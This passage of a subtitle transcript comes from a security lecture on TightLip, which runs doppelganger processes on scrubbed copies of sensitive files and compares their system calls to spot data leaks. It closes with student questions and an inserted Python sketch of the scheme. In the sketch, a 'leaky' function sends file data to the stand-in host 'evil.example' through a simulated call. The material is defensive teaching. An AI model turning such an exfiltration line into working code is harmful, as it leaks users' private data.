or the from information with,

1483
01:12:22,002 --> 01:12:25,986
let's say, a string of the same
length but just dummy data.

1484
01:12:25,986 --> 01:12:28,180
Maybe all spaces or
something like that.

1485
01:12:28,180 --> 01:12:32,308
It does this as a
background task.

1486
01:12:32,308 --> 01:12:36,772
Then the second thing it's going
to do, at some point a process

1487
01:12:36,772 --> 01:12:40,035
is going to start executing,
and so then TightLip

1488
01:12:40,035 --> 01:12:48,200
is going to detect when
and if the process tries

1489
01:12:48,200 --> 01:12:49,605
to access a sensitive file.

1490
01:12:52,510 --> 01:12:57,220
And if such an access
does take place,

1491
01:12:57,220 --> 01:13:01,986
TightLip is going to spawn
one of these doppelganger

1492
01:13:01,986 --> 01:13:02,485
processes.

1493
01:13:05,520 --> 01:13:09,500
And so what the
doppelganger process

1494
01:13:09,500 --> 01:13:14,896
looks like is very similar
to the original process that

1495
01:13:14,896 --> 01:13:16,760
tried to touch that
sensitive data,

1496
01:13:16,760 --> 01:13:21,786
but the key difference is
that the doppelganger, which

1497
01:13:21,786 --> 01:13:27,460
I'll abbreviate DG,
reads the scrubbed data.

1498
01:13:31,180 --> 01:13:34,460
So imagine that-- so the
process is executing,

1499
01:13:34,460 --> 01:13:36,900
it tries to access
your email file.

1500
01:13:36,900 --> 01:13:39,500
The system spawns this new
process, the doppelganger,

1501
01:13:39,500 --> 01:13:42,769
that doppelganger is exactly
the same as that original one,

1502
01:13:42,769 --> 01:13:44,810
but it is now reading from
the scrubbed data instead

1503
01:13:44,810 --> 01:13:46,122
of the real sensitive data.

1504
01:13:48,760 --> 01:13:51,458
What happens then?

1505
01:13:51,458 --> 01:13:54,963
Essentially,
TightLip is going

1506
01:13:54,963 --> 01:14:01,020
to run those two
processes in parallel.

1507
01:14:01,020 --> 01:14:05,620
It's going to just watch
them and see what they do.

1508
01:14:05,620 --> 01:14:09,842
And so in particular,
we're going to see,

1509
01:14:09,842 --> 01:14:21,330
do the processes issue
the same system calls

1510
01:14:21,330 --> 01:14:23,708
with the same arguments.

1511
01:14:28,050 --> 01:14:34,795
And if that's the case, then
presumably those system calls

1512
01:14:34,795 --> 01:14:38,610
do not depend on
the sensitive data.

1513
01:14:38,610 --> 01:14:41,410
So in other words, if
I start a process that

1514
01:14:41,410 --> 01:14:43,160
tries to open some
sensitive file,

1515
01:14:43,160 --> 01:14:46,390
I feed it basically junk
data, I let it execute.

1516
01:14:46,390 --> 01:14:49,860
If that doppelganger process
still does the same things

1517
01:14:49,860 --> 01:14:52,021
that the regular
process would have done,

1518
01:14:52,021 --> 01:14:53,520
then presumably it
wasn't influenced

1519
01:14:53,520 --> 01:14:56,550
by that sensitive data at all.

1520
01:14:56,550 --> 01:15:00,500
So essentially doppelganger
will let these processes run,

1521
01:15:00,500 --> 01:15:02,379
TightLip will let
these processes run,

1522
01:15:02,379 --> 01:15:03,920
and then check the
system calls here.

1523
01:15:03,920 --> 01:15:09,445
And then it might happen that in
some case the system calls diverge.

1524
01:15:13,530 --> 01:15:17,260
So in particular, what
if the doppelganger

1525
01:15:17,260 --> 01:15:21,004
starts doing things that the
regular version of the process

1526
01:15:21,004 --> 01:15:23,170
would not have done, and
then the doppelganger tries

1527
01:15:23,170 --> 01:15:24,800
to make a network call.

1528
01:15:24,800 --> 01:15:27,210
So just like in TaintDroid,
when that doppelganger tries

1529
01:15:27,210 --> 01:15:29,577
to make a network call,
that's when we say aha,

1530
01:15:29,577 --> 01:15:31,660
we should probably stop
what's happening right now

1531
01:15:31,660 --> 01:15:33,660
and then do something.

1532
01:15:33,660 --> 01:15:40,120
So if the system calls
diverge, and the doppelganger

1533
01:15:40,120 --> 01:15:47,540
makes a network call, then
we're going to do something.

1534
01:15:47,540 --> 01:15:50,980
So we're going to either
raise an alert to the user

1535
01:15:50,980 --> 01:15:52,737
or whatever.
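
The doppelganger comparison can be sketched in user space. This is only an illustration under strong assumptions: a "program" here is a plain function that reports its system calls through a callback, whereas the real system tracks actual system calls in the OS kernel. The names `scrub`, `trace_of`, and `tightlip_check`, and the host `evil.example`, are all hypothetical.

```python
from itertools import zip_longest


def scrub(text):
    # Scrubbed version: same length, dummy contents (all spaces).
    return " " * len(text)


def trace_of(program, data):
    # Run the program and record each (syscall name, arguments) it issues.
    trace = []
    program(data, lambda name, *args: trace.append((name, args)))
    return trace


def tightlip_check(program, sensitive):
    original = trace_of(program, sensitive)
    doppelganger = trace_of(program, scrub(sensitive))
    # Find the first position where the two system call traces differ.
    diverged_at = next(
        (i for i, (a, b) in enumerate(zip_longest(original, doppelganger))
         if a != b),
        None,
    )
    if diverged_at is None:
        return "ok"        # same calls, same arguments: no dependence seen
    if any(name == "send" for name, _ in doppelganger[diverged_at:]):
        return "alert"     # diverged, and the doppelganger hits the network
    return "diverged"


def benign(data, syscall):
    # Depends only on the length, which scrubbing preserves.
    syscall("write", "log.txt", len(data))


def leaky(data, syscall):
    # Sends the file contents over the network.
    syscall("send", "evil.example", data)


benign_result = tightlip_check(benign, "To: alice@example.com")
leaky_result = tightlip_check(leaky, "To: alice@example.com")
```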

1536
01:15:52,737 --> 01:15:54,670
Kind of like in TaintDroid,
but at this point

1537
01:15:54,670 --> 01:15:56,044
there's a specific
policy you can

1538
01:15:56,044 --> 01:15:58,520
add in some particular
system you're going to use.

1539
01:15:58,520 --> 01:16:00,728
But this is sort of an
interesting point at which you

1540
01:16:00,728 --> 01:16:05,140
can say well, somehow that
doppelganger process was

1541
01:16:05,140 --> 01:16:07,990
affected by that sensitive
data that was returned.

1542
01:16:07,990 --> 01:16:10,390
That means that maybe
if the user did not

1543
01:16:10,390 --> 01:16:12,597
think that a particular
process was going

1544
01:16:12,597 --> 01:16:14,680
to exfiltrate data,
now the user can actually

1545
01:16:14,680 --> 01:16:16,940
do an audit of that
program to figure out

1546
01:16:16,940 --> 01:16:20,600
why that program tried to send
that data over the network.

1547
01:16:20,600 --> 01:16:22,104
So does anyone-- go ahead.

1548
01:16:22,104 --> 01:16:23,992
AUDIENCE: So if you're
hitting something

1549
01:16:23,992 --> 01:16:26,706
like a word file or
whatever, you kind of

1550
01:16:26,706 --> 01:16:28,229
have to know what
you're zeroing out

1551
01:16:28,229 --> 01:16:29,427
and what you're [INAUDIBLE].

1552
01:16:32,593 --> 01:16:34,217
PROFESSOR: Good
question, that's right.

1553
01:16:34,217 --> 01:16:36,133
So I was going to
discuss some limitations,

1554
01:16:36,133 --> 01:16:38,008
and one of the limitations
is precisely that.

1555
01:16:38,008 --> 01:16:40,874
You need to have
per-file-type scrubbers.

1556
01:16:40,874 --> 01:16:42,746
So you can't just take
your email scrubber

1557
01:16:42,746 --> 01:16:44,380
and use it for Word.

1558
01:16:44,380 --> 01:16:47,860
And in fact, if those
scrubbers miss something,

1559
01:16:47,860 --> 01:16:50,670
so if they don't
redact everything,

1560
01:16:50,670 --> 01:16:53,719
then this system may not catch
all the possible sensitive data

1561
01:16:53,719 --> 01:16:54,360
leaks.

1562
01:16:54,360 --> 01:16:55,900
So you're exactly
right about that.

1563
01:16:55,900 --> 01:16:57,130
But I think-- go ahead.

1564
01:16:57,130 --> 01:17:00,450
AUDIENCE: So if
I understand, why

1565
01:17:00,450 --> 01:17:04,595
should the process look at the
data before saying go ahead?

1566
01:17:04,595 --> 01:17:07,000
Why wouldn't you just
send the stuff in?

1567
01:17:07,000 --> 01:17:09,240
PROFESSOR: Why
would the process--

1568
01:17:09,240 --> 01:17:12,740
AUDIENCE: If the process plans
to input data, [INAUDIBLE]?

1569
01:17:15,410 --> 01:17:17,870
PROFESSOR: Oh, no, no.

1570
01:17:17,870 --> 01:17:20,650
From the perspective
of the doppelganger,

1571
01:17:20,650 --> 01:17:22,335
I mean, it may try
to, in fact, look

1572
01:17:22,335 --> 01:17:24,747
and see things like does this
email address make sense,

1573
01:17:24,747 --> 01:17:26,580
for example, before it
tries to send it out.

1574
01:17:26,580 --> 01:17:28,330
But the doppelganger
process, it shouldn't

1575
01:17:28,330 --> 01:17:30,740
know that it's gotten
this weird scrubbed data.

1576
01:17:30,740 --> 01:17:32,010
So this gets back a
little bit to the question

1577
01:17:32,010 --> 01:17:33,134
we were just talking about.

1578
01:17:33,134 --> 01:17:37,620
If your scrubber
doesn't scrub things

1579
01:17:37,620 --> 01:17:39,790
in a semantically
reasonable way,

1580
01:17:39,790 --> 01:17:42,725
the doppelganger may, in
fact, crash, for example.

1581
01:17:42,725 --> 01:17:45,080
It expects things in this
sort of format, but it's not.

1582
01:17:45,080 --> 01:17:46,990
But at a high level,
the idea is that we're

1583
01:17:46,990 --> 01:17:51,330
trying to trick the doppelganger
into doing what it would do

1584
01:17:51,330 --> 01:17:54,690
normally, but on
data that's different

1585
01:17:54,690 --> 01:17:57,080
from the original version
and see if there

1586
01:17:57,080 --> 01:17:59,120
will be that divergence.

1587
01:17:59,120 --> 01:18:01,440
So one drawback is that,
like we're discussing,

1588
01:18:01,440 --> 01:18:04,410
this basically puts
the scrubbers in the TCB

1589
01:18:04,410 --> 01:18:06,876
and if they don't work properly,
doppelgangers might crash,

1590
01:18:06,876 --> 01:18:09,410
you might not be able to
catch some violations, things

1591
01:18:09,410 --> 01:18:10,224
like that.

1592
01:18:10,224 --> 01:18:11,890
But the nice thing
about this is that it

1593
01:18:11,890 --> 01:18:14,362
works with legacy systems.

1594
01:18:14,362 --> 01:18:15,820
So we don't have
to change anything

1595
01:18:15,820 --> 01:18:17,680
about how the application
itself runs.

1596
01:18:17,680 --> 01:18:21,950
We just have to make some fairly
minor changes to the OS kernel

1597
01:18:21,950 --> 01:18:25,020
to be able to track the
system call stuff, and then

1598
01:18:25,020 --> 01:18:26,420
things sort of work.

1599
01:18:26,420 --> 01:18:27,336
It's very, very nice.

1600
01:18:27,336 --> 01:18:29,210
And the overhead of the
system is essentially

1601
01:18:29,210 --> 01:18:31,810
the overhead of running an
additional process, which

1602
01:18:31,810 --> 01:18:34,734
is fairly low in a
modern operating system.

1603
01:18:34,734 --> 01:18:36,400
This is just sort of
a neat way to think

1604
01:18:36,400 --> 01:18:40,970
about how to do some type
of limited taint tracking

1605
01:18:40,970 --> 01:18:44,020
without doing heavyweight
changes to the runtime

1606
01:18:44,020 --> 01:18:46,165
without requiring changes
from the OS-- or sorry,

1607
01:18:46,165 --> 01:18:47,040
from the application.

1608
01:18:47,040 --> 01:18:49,490
AUDIENCE: Are we
only doing parallel

1609
01:18:49,490 --> 01:18:51,940
or waiting for each one?

1610
01:18:51,940 --> 01:18:54,125
Are we running both
processes and then

1611
01:18:54,125 --> 01:18:55,958
after that we can just
check that the system

1612
01:18:55,958 --> 01:18:56,350
calls are the same?

1613
01:18:56,350 --> 01:18:56,840
Like when do we check--

1614
01:18:56,840 --> 01:18:58,131
PROFESSOR: Yeah, good question.

1615
01:18:58,131 --> 01:19:03,500
So as long as the doppelganger
process does things

1616
01:19:03,500 --> 01:19:06,800
that the OS can control and
keep on the local machine,

1617
01:19:06,800 --> 01:19:08,925
you can imagine running
the doppelganger process

1618
01:19:08,925 --> 01:19:10,120
and the regular one forward.

1619
01:19:10,120 --> 01:19:14,240
But as soon as the doppelganger
tries to affect external state,

1620
01:19:14,240 --> 01:19:16,200
so maybe the network
is doing this and that.

1621
01:19:16,200 --> 01:19:18,722
Maybe you can think of some
other leak sources like that.

1622
01:19:18,722 --> 01:19:20,180
Maybe there's
something like pipes,

1623
01:19:20,180 --> 01:19:22,471
for example, that the kernel
doesn't know how to create

1624
01:19:22,471 --> 01:19:23,670
doppelganger state for.

1625
01:19:23,670 --> 01:19:26,591
At that point you have to
stop it and then declare

1626
01:19:26,591 --> 01:19:27,841
success or victory, basically.

1627
01:19:30,930 --> 01:19:33,262
Any other questions?

1628
01:19:33,262 --> 01:19:35,220
All right, well, that's
the end of the lecture.

1629
01:19:35,220 --> 01:19:36,261
Have a good Thanksgiving.

1630
01:19:36,261 --> 01:19:38,080
See you next week.